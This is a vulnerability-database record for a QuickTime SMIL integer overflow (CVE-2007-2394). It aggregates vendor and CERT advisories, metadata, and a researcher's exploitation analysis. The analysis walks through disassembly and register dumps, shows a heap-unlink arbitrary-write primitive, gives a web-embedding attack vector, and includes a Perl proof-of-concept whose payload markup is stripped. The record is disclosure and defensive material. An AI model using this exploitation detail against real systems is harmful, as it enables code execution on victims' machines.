VAR-200707-0547
Vulnerability from variot - Updated: 2025-04-10 20:23
Integer overflow in Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities. Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks.
TITLE: Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA26034
VERIFY ADVISORY: http://secunia.com/advisories/26034/
CRITICAL: Highly critical
IMPACT: Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION: 1.1 originally posted 2007-07-12
SOFTWARE: Apple QuickTime 7.x http://secunia.com/product/5090/
DESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
2) An unspecified error exists in the processing of movie files.
5) A design error exists in QuickTime for Java, which can be exploited to disable security checks and execute arbitrary code when a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be exploited to bypass security checks and read and write to process memory.
7) A design error exists in QuickTime for Java due to JDirect exposing interfaces that may allow loading arbitrary libraries and freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be exploited to capture the user's screen content when a user visits a web site containing a specially crafted Java applet.
QuickTime 7.2 for Mac: http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows: http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG: 2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305947
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES: US-CERT VU#582681: http://www.kb.cert.org/vuls/id/582681
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
- Apple Mac OS X
- Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way Java applets and various types of media files are handled. Since QuickTime configures most web browsers to handle QuickTime media files, an attacker could exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes Database. For further information, please see the Vulnerability Notes Database.
Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2.
On Microsoft Windows, QuickTime users can install the update by using the built-in auto-update mechanism, Apple Software Update, or by installing the update manually. Disabling QuickTime in your web browser may defend against this attack vector. For more information, refer to the Securing Your Web Browser document. Disabling Java in your web browser may defend against this attack vector. Instructions for disabling Java can be found in the Securing Your Web Browser document.
References
- Vulnerability Notes for QuickTime 7.2 - http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72
- About the security content of the QuickTime 7.2 Update - http://docs.info.apple.com/article.html?artnum=305947
- How to tell if Software Update for Windows is working correctly when no updates are available - http://docs.info.apple.com/article.html?artnum=304263
- Apple QuickTime 7.2 for Windows - http://www.apple.com/support/downloads/quicktime72forwindows.html
- Apple QuickTime 7.2 for Mac - http://www.apple.com/support/downloads/quicktime72formac.html
- Standalone Apple QuickTime Player - http://www.apple.com/quicktime/download/standalone.html
- Mac OS X: Updating your software - http://docs.info.apple.com/article.html?artnum=106704
- Securing Your Web Browser - http://www.us-cert.gov/reading_room/securing_browser/
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
Feedback can be directed to US-CERT Technical Staff. Please send email to cert@cert.org with "TA07-193A Feedback VU#582681" in the subject.
Produced 2007 by US-CERT, a government organization.
Revision History
Thursday July 12, 2007: Initial release
II. When parsing an SMIL file, arithmetic calculations can cause insufficient memory to be allocated. When copying in user-supplied data from the SMIL file, a heap-based buffer overflow occurs. This results in a potentially exploitable condition.
III. This could be accomplished using a malicious SMIL file referenced from a website under the attacker's control.
IV. Previous versions are suspected to be vulnerable.
V. WORKAROUND
iDefense is currently unaware of any effective workarounds for this vulnerability.
VI. VENDOR RESPONSE
Apple has released QuickTime 7.2 which resolves this issue. More information is available via Apple's QuickTime Security Update page at the URL shown below.
http://docs.info.apple.com/article.html?artnum=305947
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-2394 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. CREDIT
This vulnerability was reported to iDefense by David Vaartjes from ITsec Security Services http://www.itsec-ss.nl/.
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
iDefense confirmed the existence of this vulnerability in version 7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime binaries for Windows XP and Vista are identical, this issue will affect QuickTime running on Windows Vista also.
FIXED VERSIONS
Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this issue. See [2] for additional information about this update.
QuickTime 7.2 is not available for the Windows 2000 platform. Presumably, Apple dropped support for this platform.
PRODUCT DESCRIPTION
QuickTime is Apple's media player product. According to Apple, QuickTime is downloaded over 10 million times a month. According to Secunia, QuickTime is currently installed on over 50% of PCs [3].
The Synchronized MultiMedia Integration Language (SMIL) provides a high-level scripting syntax for describing multimedia presentations. SMIL files are text files that use XML-based syntax to specify what media elements to present and where and when to present them. This can be exploited to overflow that heap buffer with user supplied content, which eventually can result in the execution of arbitrary code.
When such a SMIL file is parsed the length value of the author field is stored in a short int data type (16 bit) without bounds checking. In sub_66952B50(), this value is (sign) extended to a long int data type (32 bit).
--
66952C9A     push eax
66952C9B     call sub_668B57D0
66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C]
66952CA5     mov edx, [esp+2Ch+arg_4]
66952CA9     lea ecx, [esp+2Ch+var_10]
--
So, when the length of the author field is >= 0x8000 bytes, it will be extended to a length value between 0xffff8000 and 0xffffffff.
Next, in sub_668DCFD0() the sign extended length of the author field is added to the length of the title field + 0x20:
--
668DD04D     jnz short loc_668DD0A0
668DD04F     test ebx, ebx
668DD051     jz loc_668DD1EB
668DD057 --> lea eax, [edi+ebx]  // edi holds the length of the title field + 0x20.
                                 // ebx holds the sign extended length of the author field.
668DD05A     push eax
668DD05B     push ecx
--
In sub_668DCA60(), 4 is added to the result of the calculation:
--
668DCB37     test edi, edi
668DCB39     jz short loc_668DCB40
668DCB3B --> lea eax, [edi+4]    // edi holds the result
668DCB3E     jmp short loc_668DCB42
--
Next, in sub_668F5550() the final length value is used as the dwBytes argument in a call to HeapRealloc():
--
668F555E     push eax            // dwBytes (user specified)
668F555F     push ecx            // lpMem
668F5560     push 1              // dwFlags
668F5562     push edx            // hHeap
668F5563 --> call ds:HeapReAlloc
--
This allows for the allocation of a controlled amount of memory. For example, when setting the length of the author field to 0xff00 (65280) and the length of the title field to 0xdf (223), the following situation occurs:
1: sub_66952B50():
0x0000ff00 will be sign extended to 0xffffff00.
2: sub_668DCFD0():
0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00 resulting in a length value of 0xffffffff.
3: sub_668DCA60():
0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.
4: sub_668F5550():
HeapRealloc() will allocate 0x00000003 bytes of memory.
Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0() as the dest argument in a call to memcpy():
--
668DD08E     push ebx            // count, length value right after sign extension (0xffffff00).
668DD08F     push edx            // src, buffer with user supplied (author) content.
668DD090     add eax, esi
668DD092 --> push eax            // dest, 3 byte buffer.
668DD093     call _memcpy
668DD098     add esp, 18h
668DD09B     jmp loc_668DD1E5
--
This copy action will result in an overflow of the 3 byte heap buffer with data from the author field (user supplied). Due to the large amount of data written, this will finally result in an access violation when memory is read or written outside the heap page. The exception is handled by the program and execution continues with a corrupt heap.
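An added example, not part of the original advisory and not QuickTime code: a C model of the length arithmetic walked through above, next to a bounds-checked form of the same size calculation. The function names, the FIELD_MAX cap and the flat 32-bit model are assumptions made for illustration; no copy is performed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed policy limit for this sketch; not a QuickTime constant. */
#define FIELD_MAX   ((size_t)1 << 20)
#define HEADER_LEN  0x20u   /* the "+ 0x20" added to the title length */
#define TRAILER_LEN 4u      /* the "+ 4" added before the reallocation */

/* Step 1: the author length is kept in 16 bits without a bounds check,
 * then sign-extended to 32 bits (the movsx in the listing). */
static uint32_t modeled_sign_extend(uint32_t author_len)
{
    uint16_t stored = (uint16_t)author_len;   /* silent narrowing */
    int32_t ext = (stored & 0x8000u) ? (int32_t)stored - 0x10000
                                     : (int32_t)stored;
    return (uint32_t)ext;
}

/* Steps 2-3: wrapping 32-bit additions that yield the dwBytes value. */
static uint32_t modeled_alloc_size(uint32_t title_len, uint32_t author_len)
{
    uint32_t sum = (title_len + HEADER_LEN) + modeled_sign_extend(author_len);
    return sum + TRAILER_LEN;
}

/* The count later handed to memcpy: the sign-extended author length. */
static uint32_t modeled_copy_count(uint32_t author_len)
{
    return modeled_sign_extend(author_len);
}

/* Bounds-checked form: lengths stay in size_t (no narrowing), each field is
 * capped, and every addition is checked before it is carried out.
 * Returns 0 and stores the size in *out, or -1 if the input is rejected. */
static int checked_alloc_size(size_t title_len, size_t author_len, size_t *out)
{
    size_t total = (size_t)HEADER_LEN + TRAILER_LEN;

    if (title_len > FIELD_MAX || author_len > FIELD_MAX)
        return -1;
    if (title_len > SIZE_MAX - total)
        return -1;
    total += title_len;
    if (author_len > SIZE_MAX - total)
        return -1;
    total += author_len;

    *out = total;
    return 0;
}

int main(void)
{
    /* Lengths taken from the advisory's worked example. */
    uint32_t title_len = 0xdf, author_len = 0xff00;
    size_t safe = 0;

    printf("sign-extended author length: 0x%08x\n",
           (unsigned)modeled_sign_extend(author_len));
    printf("modeled allocation size:     0x%08x\n",
           (unsigned)modeled_alloc_size(title_len, author_len));
    printf("modeled copy count:          0x%08x\n",
           (unsigned)modeled_copy_count(author_len));

    if (checked_alloc_size(title_len, author_len, &safe) == 0)
        printf("checked allocation size:     0x%zx\n", safe);
    else
        printf("checked calculation rejected the input\n");
    return 0;
}
```

For small lengths both calculations agree; they diverge once the author length no longer fits in a signed 16-bit value.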
For my platform (win2k), when a call to HeapAlloc() is executed the unlink code of ntdll will "fail" because we have overwritten pointers in the heap management structures of other heap buffers with our data. The status of the registers during unlinking is:
--
EAX 78787878 <-- user supplied
ECX 78787878 <-- user supplied
EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--
--
77f867e6 mov dword ptr ds:[ecx],eax
77f867e8 mov dword ptr ds:[eax+4],ecx
--
The unlink instructions will result in the following exception:
QuickTimePlayerMain: QuickTimePlayer.exe
"The instruction at "0x77f867e6" referenced memory at "0x78787878". The memory could not be "written"
This shows that we are able to overwrite 4 bytes anywhere in the address space of the process with "any" 4 byte value we want, which can for example be exploited to overwrite function pointers like the SEH or UEF to gain control of the process. This 4 byte overwrite via the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking" is used on these platforms.
ATTACK VECTORS
This vulnerability can be triggered by luring a target user into running a malicious SMIL file locally or via a webpage. In the latter scenario the OBJECT (IE) and/or EMBED (Firefox) tags can be used:
SRC="available-sample.qtif" QTSRC="poc.smil" WIDTH="10" HEIGHT="10" PLUGINSPAGE="www.apple.com/quicktime/download" TYPE="video/quicktime" />
PROOF OF CONCEPT
#!/usr/bin/perl -w
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
# David Vaartjes

$file = "poc.smil";
$padd = "x";
$cop_len = 36;

# By choosing the following lengths the
# integer overflow will be triggered.
$tit_len = 223;
$auth_len = 65280;

open(FH,">$file") or die "Can't open file:$!";
print FH "\n". "\n". " \n". " \n". " \n". "\n". "";
close(FH);
REFERENCES
[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/
DISCLOSURE TIMELINE
04/02/2007 Initial vendor notification (by iDefense)
04/09/2007 Initial vendor response
07/11/2007 Apple security bulletin & patches available
07/11/2007 Public disclosure of iDefense advisory
09/03/2007 Public disclosure of this advisory
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200707-0547",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.2"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.3"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.4"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.4"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.1"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.5"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.2"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.1"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": null
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.3"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": "quicktime",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "version"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "7.2"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.4.9"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.3.9"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.5"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.4"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.3"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.4"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.3"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.5.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.5.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.5"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6"
},
{
"model": "quicktime",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "7.2"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apple:quicktime",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jonathan \u0027Wolf\u0027 RentzschDavid VaartjesAdam Gowdiak\u203b zupa@man.poznan.pl",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
}
],
"trust": 0.6
},
"cve": "CVE-2007-2394",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2007-2394",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-25756",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-2394",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#582681",
"trust": 0.8,
"value": "8.66"
},
{
"author": "NVD",
"id": "CVE-2007-2394",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200707-274",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-25756",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Integer overflow in Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities. \nRemote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\n----------------------------------------------------------------------\n\nTITLE:\nApple QuickTime Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA26034\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/26034/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nExposure of sensitive information, DoS, System access\n\nWHERE:\n\u003eFrom remote\n\nREVISION:\n1.1 originally posted 2007-07-12\n\nSOFTWARE:\nApple QuickTime 7.x\nhttp://secunia.com/product/5090/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Apple QuickTime, which can\nbe exploited by malicious people to compromise a user\u0027s system. 
\n\n1) An unspecified error exists in the processing of H.264 movies. \n\n2) An unspecified error exists in the processing of movie files. \n\n5) A design error exists in QuickTime for Java, which can be\nexploited to disable security checks and execute arbitrary code when\na user visits a web site containing a specially crafted Java applet. \n\n6) A design error exists in QuickTime for Java, which can be\nexploited to bypass security checks and read and write to process\nmemory. \n\n7) A design error exists in QuickTime for Java due to JDirect\nexposing interfaces that may allow loading arbitrary libraries and\nfreeing arbitrary memory. \n\n8) A design error exists in QuickTime for Java, which can be\nexploited to capture the user\u0027s screen content when a user visits a\nweb site containing a specially crafted Java applet. \n\nQuickTime 7.2 for Mac:\nhttp://www.apple.com/support/downloads/quicktime72formac.html\n\nQuickTime 7.2 for Windows:\nhttp://www.apple.com/support/downloads/quicktime72forwindows.html\n\nPROVIDED AND/OR DISCOVERED BY:\n1) The vendor credits Tom Ferris, Security-Protocols.com and Matt\nSlot, Ambrosia Software, Inc. \n2) The vendor credits Jonathan \u0027Wolf\u0027 Rentzsch of Red Shed Software. \n3) The vendor credits Tom Ferris, Security-Protocols.com. \n5, 6, 7) The vendor credits Adam Gowdiak. \n8) Reported by the vendor. \n\nCHANGELOG:\n2007-07-12: Added link to US-CERT. \n\nORIGINAL ADVISORY:\nApple:\nhttp://docs.info.apple.com/article.html?artnum=305947\n\niDefense:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556\n\nOTHER REFERENCES:\nUS-CERT VU#582681:\nhttp://www.kb.cert.org/vuls/id/582681\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. 
\n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n National Cyber Alert System\n\n\t\tTechnical Cyber Security Alert TA07-193A\n\n\nApple Releases Security Updates for QuickTime\n\n Original release date: July 12, 2007\n Last revised: --\n Source: US-CERT\n\n\nSystems Affected\n\n Apple QuickTime on systems running\n\n * Apple Mac OS X\n * Microsoft Windows\n\n\nOverview\n\n Apple QuickTime contains multiple vulnerabilities. \n\n\nI. Description\n\n Apple QuickTime 7.2 resolves multiple vulnerabilities in the way\n Java applets and various types of media files are handled. Since QuickTime configures most\n web browsers to handle QuickTime media files, an attacker could\n exploit these vulnerabilities using a web page. \n\n Note that QuickTime ships with Apple iTunes. \n\n For more information, please refer to the Vulnerability Notes\n Database. For further information, please see\n the Vulnerability Notes Database. Solution\n\nUpgrade QuickTime\n\n Upgrade to QuickTime 7.2. \n\n On Microsoft Windows, QuickTime users can install the update by\n using the built-in auto-update mechanism, Apple Software Update, or\n by installing the update manually. Disabling QuickTime in your web browser may defend\n against this attack vector. 
For more information, refer to the\n Securing Your Web Browser document. Disabling Java in your web browser may defend against\n this attack vector. Instructions for disabling Java can be found in\n the Securing Your Web Browser document. \n\n\nReferences\n\n * Vulnerability Notes for QuickTime 7.2 -\n \u003chttp://www.kb.cert.org/vuls/byid?searchview\u0026query=QuickTime_72\u003e\n\n * About the security content of the QuickTime 7.2 Update -\n \u003chttp://docs.info.apple.com/article.html?artnum=305947\u003e\n\n * How to tell if Software Update for Windows is working correctly when no updates are available -\n \u003chttp://docs.info.apple.com/article.html?artnum=304263\u003e\n\n * Apple QuickTime 7.2 for Windows -\n \u003chttp://www.apple.com/support/downloads/quicktime72forwindows.html\u003e\n\n * Apple QuickTime 7.2 for Mac -\n \u003chttp://www.apple.com/support/downloads/quicktime72formac.html\u003e\n\n * Standalone Apple QuickTime Player -\n \u003chttp://www.apple.com/quicktime/download/standalone.html\u003e\n\n * Mac OS X: Updating your software -\n \u003chttp://docs.info.apple.com/article.html?artnum=106704\u003e\n\n * Securing Your Web Browser -\n \u003chttp://www.us-cert.gov/reading_room/securing_browser/\u003e\n \n\n ____________________________________________________________________\n\n The most recent version of this document can be found at:\n\n \u003chttp://www.us-cert.gov/cas/techalerts/TA07-193A.html\u003e\n ____________________________________________________________________\n\n Feedback can be directed to US-CERT Technical Staff. Please send\n email to \u003ccert@cert.org\u003e with \"TA07-193A Feedback VU#582681\" in the\n subject. \n ____________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. 
\n ____________________________________________________________________\n\n Produced 2007 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n Thursday July 12, 2007: Initial release\n\n\n\n\n. \n\nII. When parsing an SMIL file,\narithmetic calculations can cause insufficient memory to be allocated. \nWhen copying in user-supplied data from the SMIL file, a heap-based\nbuffer overflow occurs. This results in a potentially exploitable\ncondition. \n\nIII. This could\nbe accomplished using a malicious SMIL file referenced from a website\nunder the attacker\u0027s control. \n\nIV. Previous versions are\nsuspected to be vulnerable. \n\nV. WORKAROUND\n\niDefense is currently unaware of any effective workarounds for this\nvulnerability. \n\nVI. VENDOR RESPONSE\n\nApple has released QuickTime 7.2 which resolves this issue. More\ninformation is available via Apple\u0027s QuickTime Security Update page at\nthe URL shown below. \n\nhttp://docs.info.apple.com/article.html?artnum=305947\n\nVII. CVE INFORMATION\n\nThe 